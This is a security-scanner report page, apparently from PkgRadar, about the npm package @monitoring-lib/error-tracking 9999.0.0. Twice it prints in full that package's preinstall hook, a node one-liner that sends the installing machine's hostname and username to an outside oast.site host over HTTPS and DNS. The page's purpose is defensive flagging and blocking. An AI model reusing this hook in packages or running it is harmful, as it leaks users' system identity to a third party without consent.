npm · registry.npmjs.org

@monitoring-lib/error-tracking

Install Lifecycle Remote Or Exec: preinstall="node -e \"const h=require('os').hostname(),u=require('os').userInfo().username;require('https').get('https://d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site/?h='+encodeURIComponent(h)+'&u='+encodeURIComponent(u)+'&pkg=monitoring-lib-error-tracking').on('error',()=>{});require('dns').lookup('monitoring-lib.'+h+'.d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site',()=>{})\""

Why PkgRadar flagged 9999.0.0

Severity	Signal	Evidence
high	Install Lifecycle Remote Or Exec	preinstall="node -e \"const h=require('os').hostname(),u=require('os').userInfo().username;require('https').get('https://d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site/?h='+encodeURIComponent(h)+'&u='+encodeURIComponent(u)+'&pkg=monitoring-lib-error-tracking').on('error',()=>{});require('dns').lookup('monitoring-lib.'+h+'.d8ks495t5p5ut2enft8041g7fusnfsy5e.oast.site',()=>{})\"" · package.json
high	New Account With Lifecycle Hook	package first published 0 day(s) ago, 1 total version(s), has lifecycle hook · package.json

Scanned versions

Version	Verdict	Score	Scanned (UTC)
`9999.0.0`	High risk	35	2026-06-11

Related campaigns

cyberxcmd — 15 releases, max score 95

Block this in CI

PkgRadar gates @monitoring-lib/error-tracking (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm @monitoring-lib/[email protected]

Start free — 25 scans / mo View full evidence